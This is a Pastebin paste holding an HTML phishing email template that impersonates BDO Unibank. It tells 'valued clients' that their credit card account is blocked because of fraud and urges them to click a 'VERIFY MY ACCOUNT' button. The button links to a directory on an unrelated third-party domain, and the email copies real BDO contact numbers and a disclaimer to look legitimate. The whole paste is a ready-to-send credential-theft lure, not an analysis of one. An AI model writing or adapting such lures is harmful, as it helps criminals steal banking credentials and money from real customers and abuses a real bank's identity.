Advertisement
Guest User

asd

a guest
Apr 25th, 2018
214
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.07 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>BDO | Online Banking</title>
  5.  
  6. <style type="text/css">
  7.  
  8.  
  9. body
  10. {
  11. font-family: verdana;
  12. color: #333;
  13. margin: 0px auto;
  14. color: black;
  15. }
  16.  
  17. .container
  18. {
  19. width: 600px;
  20. padding: 20px;
  21. margin: 0px auto;
  22. }
  23.  
  24. .header
  25. {
  26. width: 100%;
  27. }
  28.  
  29. .content
  30. {
  31. background-color: #eee;
  32. padding: 20px;
  33. text-align: justify;
  34. }
  35.  
  36. .footer
  37. {
  38. background-color: #ddd;
  39. padding: 15px;
  40. color: #555;
  41. font-style: italic;
  42. font-size: 12px;
  43. border-bottom: 40px solid #323289;
  44. }
  45.  
  46. p
  47. {
  48. color: black;
  49. }
  50.  
  51. img
  52. {
  53. width: 100%;
  54. }
  55.  
  56. .a
  57. {
  58. text-decoration: none;
  59. text-transform: uppercase;
  60. background-color: #3366ff;
  61. padding: 10px;
  62. padding-left: 50px;
  63. padding-right: 50px;
  64. overflow: hidden;
  65. color: white;
  66. border-radius: 5px;
  67. }
  68.  
  69. .td
  70. {
  71. width: 3%;
  72. }
  73.  
  74.  
  75.  
  76. </style>
  77.  
  78. </head>
  79. <body>
  80.  
  81. <div class="container">
  82. <div class="header">
  83. <img src="http://i64.tinypic.com/25rz1mp.jpg">
  84. </div>
  85.  
  86. <div class="content">
  87. <h2>Dear Valued Client,</h2>
  88. <p>
  89. You need to take action on your BDO Credit Card!
  90. <br><br>
  91. It has come to our attention that there are many fraudster that are trying our acccount holders,
  92. We are requiring you to please verify your information in our records because we are conducting out
  93. anti-fraud security for our account owners due to fraud emails and unauthorized
  94. transactions reports. This is part of our new improved anti-fraud security measures.
  95. In order to verify and secure your account and receive funds again please verify
  96. your account information from the link given below. Your account will remain
  97. blocked until the verification is complete and confirmed. Thank you.</p>
  98. <br><br>
  99. <center><b><a href="https://www.inoxindia.com/Security-BDO/" class="a">VERIFY MY ACCOUNT</a></b></center>
  100.  
  101. <br>
  102. <p>Thank you for using BDO Personal Online Banking.
  103. <br><br>
  104. BDO Mobile Banking is also available for easy, convenient, and secure banking while on-the-go! Just search for BDO Unibank from Apple App Store or Google Play Store.
  105. <br><br>
  106. You may reach our BDO Customer Contact Center via email at callcenter@bdo.com.ph, or through the following numbers:</p>
  107. <br><br>
  108. <table>
  109. <tr>
  110. <td>631-8000 (Metro Manila)</td><td class="td">:</td><td>1800-10-631-8000 (PLDT)</td>
  111. </tr>
  112. <tr>
  113. <td>1800-3-631-8000 (Digitel)</td><td class="td">:</td><td> 1800-5-631-8000 (Bayantel)</td>
  114. </tr>
  115. <tr>
  116. <td>1800-8-631-8000 (Globelines)</td><td class="td">:</td><td> (Int'l. Access Code) + 800-8-631-8000</td>
  117. </tr>
  118. </table>
  119. <br><br>
  120. <p>Thank you and we are glad to be of service to you
  121. <br><br>
  122. *This is a system generated email. Please do not reply*</p>
  123.  
  124. </div>
  125.  
  126. <div class="footer">
  127. DISCLAIMER
  128. <br><br>
  129. "This message is for the designated recipient only and may contain confidential and/or privileged information. If you have
  130. received it in error, please delete it and advise the sender immediately. You should not copy or use it for any other purpose,
  131. nor disclose its contents to any other person."
  132. </div>
  133.  
  134. </div>
  135.  
  136. </body>
  137. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement